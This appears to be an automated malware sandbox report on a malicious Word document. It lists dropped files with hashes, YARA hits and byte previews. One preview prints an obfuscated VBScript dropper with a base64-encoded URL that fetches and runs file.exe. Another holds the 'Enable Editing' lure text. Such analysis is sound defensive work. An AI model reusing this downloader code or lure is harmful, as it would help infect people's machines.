                  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                  • TCP Packets have been reduced to 100
                  • Execution Graph export aborted for target powershell.exe, PID 264 because it is empty
                  • Not all processes were analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  Time      Type             Description
                  05:34:20  API Interceptor  48x Sleep call for process: powershell.exe modified
                  05:34:27  API Interceptor  824x Sleep call for process: file.exe modified
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                  Category:dropped
                  Size (bytes):676320
                  Entropy (8bit):7.876330435838718
                  Encrypted:false
                  SSDEEP:12288:8mNV/R3qdeJpAQxZg2ZE0PU4vPDC+0BOh8ybWIJQ3P0tX8glVk+4uWFG49:8mNV/RadXcvZ72PGX8g0uWA49
                  MD5:A1AFEF77EEC567ADB1076E8679AF207B
                  SHA1:842A3650C51486F329A4079CA4B62AE5542A8C98
                  SHA-256:2219616AFA29DD45A0B8926C8D840C5168F3B9E14A14F7569EA70EA8F5ACAA79
                  SHA-512:8DAFDDABA28D56F80B09545068A9A292A0D6E8C21D1D8CA0395B3AA113C467C4134A1781D62D78BA541AECF519DADA47F46D39EB59BF41B3B9366A3659027253
                  Malicious:true
                  Yara Hits:
                  • Rule: SUSP_NullSoftInst_Combo_Oct20_1, Description: Detects suspicious NullSoft Installer combination with common Copyright strings, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe, Author: Florian Roth (Nextron Systems)
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 6%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....Oa.................f....... ...3............@..................................)....@.................................D........p..H............9..@............................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...@...0...........................rsrc...H....p......................@..@................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:Windows metafile
                  Category:dropped
                  Size (bytes):3712
                  Entropy (8bit):5.038804771790638
                  Encrypted:false
                  SSDEEP:48:PZk/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1f8:Rk7Hgwj+mbYf3LSrhlOs0f5aSdHn63DE
                  MD5:4D808394C1EEFE8BB33A88A06C27401A
                  SHA1:E7E85FAC534EB92A90047CEAA4FBA4D0BB2FB761
                  SHA-256:588A5724964EDC5765F224738AD5AE3FE39D8F67DF7C3990013739808663A396
                  SHA-512:499AA1814D8E9E4982EBE52063786EDBCB924C587045844638F2C61FEED4900A321F8C6E166A76FBEACC5AAA4ABAA8B925523DE5EF1FDD8A7C9323B7D52D517E
                  Malicious:false
                  Preview:......@.....!.....................5...........................Segoe UI....C.......@...............-...........................A..... . ..... . ...6.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...6.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:370 sysV pure executable
                  Category:dropped
                  Size (bytes):262160
                  Entropy (8bit):0.03833554348224308
                  Encrypted:false
                  SSDEEP:12:IyQ3fvTmeCEG+b2+f3TE/lfuNH1RCZK4vFQyfulTa5Pw1ETgobVOI7lP1g6UKK4N:7e8+S+f3CsHT8v5GIw1Ew2sEr10+
                  MD5:8844F30E839A1EFB15EF793ADF3FAADB
                  SHA1:63C9886F6646A18F84551260C802A23EA5EA59C6
                  SHA-256:353497E0866CB4835118DF6240847822FDEBBFD6F91A54385CD8C91C923927BF
                  SHA-512:3F57407F8B80C80022CBF11C023C1A42C56C2B03F57F87BF342DF19D624249E1C9DB82DC52791B3C1DAEA541884935B20615645FC2976448BE123D37D231A6D4
                  Malicious:false
                  Preview:X.:.....`.c....../......xt......HV.......d..............0.].......@@......b.......^.............................................................................@.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2...........................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):72192
                  Entropy (8bit):5.409452390606404
                  Encrypted:false
                  SSDEEP:1536:jjzaoaDabaRaOa2EV1/pfw8jzaoaDabaRaOa2EV1/pb4M:jjzaoaDabaRaOa2yhpbjzaoaDabaRaOE
                  MD5:19AEC7C9E1A6F87D33460B38D45598C1
                  SHA1:29A61AFAA40A1D73C86C2C8B8F45129FB53ADD46
                  SHA-256:77AE5958D01783AD2EA852528C06B3990170E2BE2CC56C4E3B6BA6DA1F794F2A
                  SHA-512:63011FE4D636EE50FE5549F8728CC2DF6B91325B7D42D10A1B79492C3F9FA26FA11B19EECD5A4161F168ACBA5E301A50864B85056F517D252B0CC9D3228F2EF7
                  Malicious:false
                  Preview:......................>.......................................................~...........................................................................................................................................................................................................................................................................................................................................................................................................................................................<...;........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:.......=...>...C...?...@...A...B...F...D...E...G...........I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):44610
                  Entropy (8bit):2.915845583250266
                  Encrypted:false
                  SSDEEP:768:jH/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:LFia0Dqeb0nstw29rVzWSgm58F
                  MD5:DD4D5630ACAED2C14DBBFEF135337A90
                  SHA1:F9CF009C0D71D59B8E976F3CB9FF8C58DB65C777
                  SHA-256:15C024ACB0117A71C3A5FA9C0D4CB47C15B1724C868340290561E242CCAACABE
                  SHA-512:E7D91217A34A9CCE6D829903B12FB9FD49E104418488DEB83794D0779DCCF30D723E46F4DBC7FE0BA59FFFB4BBDEAB6D3AF2E46EF26112B4BAADAEEF4E74FC98
                  Malicious:false
                  Preview:c.0.5.P.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .E.d.i.t.i.n.g. .t.o. .v.i.e.w. .t.h.e. .d.o.c.u.m.e.n.t.......=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.F.Z.d.t.f.h.g.Y.g.e.g.h.D.9 ....s.c.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".L.I.N.K........................................................................................................................................... ...<...N...f...h...n...p...v.................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....OJ..QJ..U..^J..mH..sH.. .j..g...OJ..QJ..U..^J..mH..sH....OJ..QJ..^J..mH..sH.....h..N.OJ..QJ..^J.....h..N..h..N.OJ..QJ..^J.....h..N..h..N.5..OJ..QJ..^J....h..N..h..N.OJ..PJ..QJ..^J.
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):1024
                  Entropy (8bit):0.05390218305374581
                  Encrypted:false
                  SSDEEP:3:ol3lYdn:4Wn
                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):1536
                  Entropy (8bit):1.3552060938024997
                  Encrypted:false
                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlby:IiiiiiiiiifdLloZQc8++lsJe1Mzx
                  MD5:8F34D16DF01F276F2E234FC9258B3727
                  SHA1:428153094C7CD2746DD5A708F5E39AFBF8662837
                  SHA-256:10E530C54C6FE6553CBDEC0ACA8A2E3F9D9EAC12A2A77A913DAB2061D2600550
                  SHA-512:48B7984A98A666C4F5243D1B7DF2017D78C73AC20F88B14E2F7CC519C329E2E4B4EAB9FFD0C20E6CDD54FB63D724C6521312D035156BAD123260646E0C8F2B66
                  Malicious:false
                  Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):27285
                  Entropy (8bit):5.239363181413612
                  Encrypted:false
                  SSDEEP:384:fk5bxzaoaDabaRaOa2EqrRiymKviciqNEEE6oEaE3DvzLfanpob:sjzaoaDabaRaOa2EGYym1qSPW1LzOnpc
                  MD5:8BED1182F10668855D0EBF97E4D6AB19
                  SHA1:70026363421111F8B032D8BA267F1A3D6E39A9AB
                  SHA-256:DB605E4427B82B840EBEF2FBC01CAF768AB8557D823AFF39694E8C9532D8BAF2
                  SHA-512:73168037D3BF83D672511FAE9631026E73B17AD2B5E54904675C0496120FB1C16DB8D8A606A8159F718B8E58E945DEECE24A8D7F6C4B5743F7DF3BF2D8258162
                  Malicious:true
                  Preview:<scriptleT.. ><script runat="server" language = 'vbscript'>....fsdfdsfs = "aHR0UHM6Ly90aGVrYXJpYmFjcnVpc2Vjb21wYW55LmNvbS9maWxlLmV4ZQ==" 'wiiurg..yulkytjtrhtjrkdsarjky ="ZmlsZS5leGU=" 'wiiurg..Function age64Funccode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. jdcuidowfubg7 = "b" + "je".. vbsxjkhwgejkdwfgkvbf = "Cr".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + "eateO".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + jdcuidowfubg7 + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"")" + ".C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + vbsxjkhwgejkdwfgkvbf + vposaleusaogr + soswjwslvc + "E".. mosdo
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:gAWY3n:qY3n
                  MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                  SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                  SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                  SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                  Malicious:false
                  Preview:[ZoneTransfer]..ZoneId=3..
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):11776
                  Entropy (8bit):6.024446974480565
                  Encrypted:false
                  SSDEEP:192:Vm9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:QJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
                  MD5:E23600029D1B09BDB1D422FB4E46F5A6
                  SHA1:5D64A2F6A257A98A689A3DB9A087A0FD5F180096
                  SHA-256:7342B73593B3AA1B15E3731BFB1AFD1961802A5C66343BAC9A2C737EE94F4E38
                  SHA-512:C971F513142633CE0E6EC6A04C754A286DA8016563DAB368C3FAC83AEF81FA3E9DF1003C4B63D00A46351A9D18EAA7AE7645CAEF172E5E1D6E29123AB864E7AC
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./@t.k!..k!..k!..9T..l!.. Y..l!..k!..x!...T..o!...T..j!...T..j!...T..j!..Richk!..........................PE..L.....c.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.......*..............@....reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):11776
                  Entropy (8bit):6.024446974480565
                  Encrypted:false
                  SSDEEP:192:Vm9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:QJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
                  MD5:E23600029D1B09BDB1D422FB4E46F5A6
                  SHA1:5D64A2F6A257A98A689A3DB9A087A0FD5F180096
                  SHA-256:7342B73593B3AA1B15E3731BFB1AFD1961802A5C66343BAC9A2C737EE94F4E38
                  SHA-512:C971F513142633CE0E6EC6A04C754A286DA8016563DAB368C3FAC83AEF81FA3E9DF1003C4B63D00A46351A9D18EAA7AE7645CAEF172E5E1D6E29123AB864E7AC
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./@t.k!..k!..k!..9T..l!.. Y..l!..k!..x!...T..o!...T..j!...T..j!...T..j!..Richk!..........................PE..L.....c.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.......*..............@....reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):11776
                  Entropy (8bit):6.024446974480565
                  Encrypted:false
                  SSDEEP:192:Vm9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:QJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
                  MD5:E23600029D1B09BDB1D422FB4E46F5A6
                  SHA1:5D64A2F6A257A98A689A3DB9A087A0FD5F180096
                  SHA-256:7342B73593B3AA1B15E3731BFB1AFD1961802A5C66343BAC9A2C737EE94F4E38
                  SHA-512:C971F513142633CE0E6EC6A04C754A286DA8016563DAB368C3FAC83AEF81FA3E9DF1003C4B63D00A46351A9D18EAA7AE7645CAEF172E5E1D6E29123AB864E7AC
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./@t.k!..k!..k!..9T..l!.. Y..l!..k!..x!...T..o!...T..j!...T..j!...T..j!..Richk!..........................PE..L.....c.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.......*..............@....reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:59 2022, mtime=Tue Mar 8 15:45:59 2022, atime=Sat Mar 18 11:34:15 2023, length=248144, window=hide
                  Category:dropped
                  Size (bytes):1019
                  Entropy (8bit):4.5488977700317035
                  Encrypted:false
                  SSDEEP:24:8oE3k/XT89dqPplqMNef/1+WDv3q+cX7cY:8osk/XTko7NC/a+Kl
                  MD5:A437967E1061678D0FF0E50870435957
                  SHA1:BC5F02EA09D07829F2B9C03F75C515911240F215
                  SHA-256:DBFCEDA42BC9CC0A58EC27B58946233256391507B83DC57643D12AFDE3F2EB6A
                  SHA-512:CA679DA91B7459CCFFCAF1AA47589FF7E55A6A06F8155A9E8540AC7D50C7FDDFC6CADFFA92162733816FC0A1947167F15191808CE9854ED52697D7F7A0627FFE
                  Malicious:false
                  Preview:L..................F.... .....k..3....k..3...@..Y..P............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT...Desktop.d......QK.XhT.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.P...rVHd .TEPO00~1.DOC..L......hT..hT..*...r.....'...............T.E.P.O.0.0.1.5.9.2.2...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop\TEPO0015922.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.T.E.P.O.0.0.1.5.9.2.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......061544..........D_....3N...W...9I..N..... .....[D_....3N...W...9I
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:Generic INItialization configuration [doc]
                  Category:dropped
                  Size (bytes):73
                  Entropy (8bit):4.708249518901646
                  Encrypted:false
                  SSDEEP:3:bDuMJlpwxXpulmX1mzXpulv:bCiwRpur7pu1
                  MD5:171A06F44A4A1DF6E94542EC2401B637
                  SHA1:0CBD760BE24649A735405B819571C0FA21DD4FE3
                  SHA-256:E9570E3F648D804D3339EE4C51DD2E09E45213D17E5AED1A608264BE1C62AAFD
                  SHA-512:999E5638639B4028DBB7BFFD2901EC0D1028E96766C469F445F9CB518B3160E57ADEDDA18C42CC25AAF870FE008B289E3ECAA6B241D4F4FD503AC3B891355943
                  Malicious:false
                  Preview:[folders]..Templates.LNK=0..TEPO0015922.LNK=0..[doc]..TEPO0015922.LNK=0..
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):2.503835550707525
                  Encrypted:false
                  SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                  MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                  SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                  SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                  SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                  Malicious:false
                  Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                  Category:dropped
                  Size (bytes):2
                  Entropy (8bit):1.0
                  Encrypted:false
                  SSDEEP:3:Qn:Qn
                  MD5:F3B25701FE362EC84616A93A45CE9998
                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                  Malicious:false
                  Preview:..
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8016
                  Entropy (8bit):3.584171275091943
                  Encrypted:false
                  SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                  MD5:8C1FC95796F285E35E3C114072F0994C
                  SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                  SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                  SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                  Malicious:false
                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8016
                  Entropy (8bit):3.584171275091943
                  Encrypted:false
                  SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                  MD5:8C1FC95796F285E35E3C114072F0994C
                  SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                  SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                  SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                  Malicious:false
                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8016
                  Entropy (8bit):3.584171275091943
                  Encrypted:false
                  SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                  MD5:8C1FC95796F285E35E3C114072F0994C
                  SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                  SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                  SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                  Malicious:false
                  Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 11025 Hz
                  Category:dropped
                  Size (bytes):66112
                  Entropy (8bit):5.179999054900731
                  Encrypted:false
                  SSDEEP:1536:BXbR5BGcY3nVQkEwzmnOqF/Mkb2iqSfrlAjX6vDVp89XTnvMNa48XSdMo70BaXDM:DzbYbIc3/
                  MD5:25C91AD0CC8B70FCAC47A132879893EF
                  SHA1:6F842222085854C037FB3E83ABEF2A841CFEF932
                  SHA-256:C08AB0F702503A43090DF125191B8C6C84B163DF40FF077C9D5CD064E33E1B93
                  SHA-512:F418FB5223485C2C96AF4B286A7B11850BBF52F9DBFADA3FD9D979B60A196D53294D2225EC8860228F3A949FAA1DD61ED913341A74E1B3F60A9F7F30659B2155
                  Malicious:false
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Category:dropped
                  Size (bytes):297472
                  Entropy (8bit):5.872932743464719
                  Encrypted:false
                  SSDEEP:6144:8NBtNg2np1eFXhtBE/ByZD9Q9thDhauHiNOafnk:8NB74XhHE5yZDYDhasg
                  MD5:1A2D40F5C02CEEB8EB6CD94932B39130
                  SHA1:8C460E86ABDB90E157A5E2DB5D3D24F8D51DC516
                  SHA-256:8B6E649444A08D77DFD1FD646F6FCC2490EC222A2C1F8E633B08F9DC7A66458A
                  SHA-512:F0C9AB06B8F73087D2B2A098D73A6F246D5E2506CEF19B27A942DC40E87F542E42EDAA2D97500B9E5F430F763AA182E0F43F29A02B4C2015EDAFC2B7F90D3278
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Process:C:\Users\user\AppData\Roaming\file.exe
                  File Type:HTML document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1245
                  Entropy (8bit):5.462849750105637
                  Encrypted:false
                  SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                  MD5:5343C1A8B203C162A3BF3870D9F50FD4
                  SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                  SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                  SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                  Malicious:false
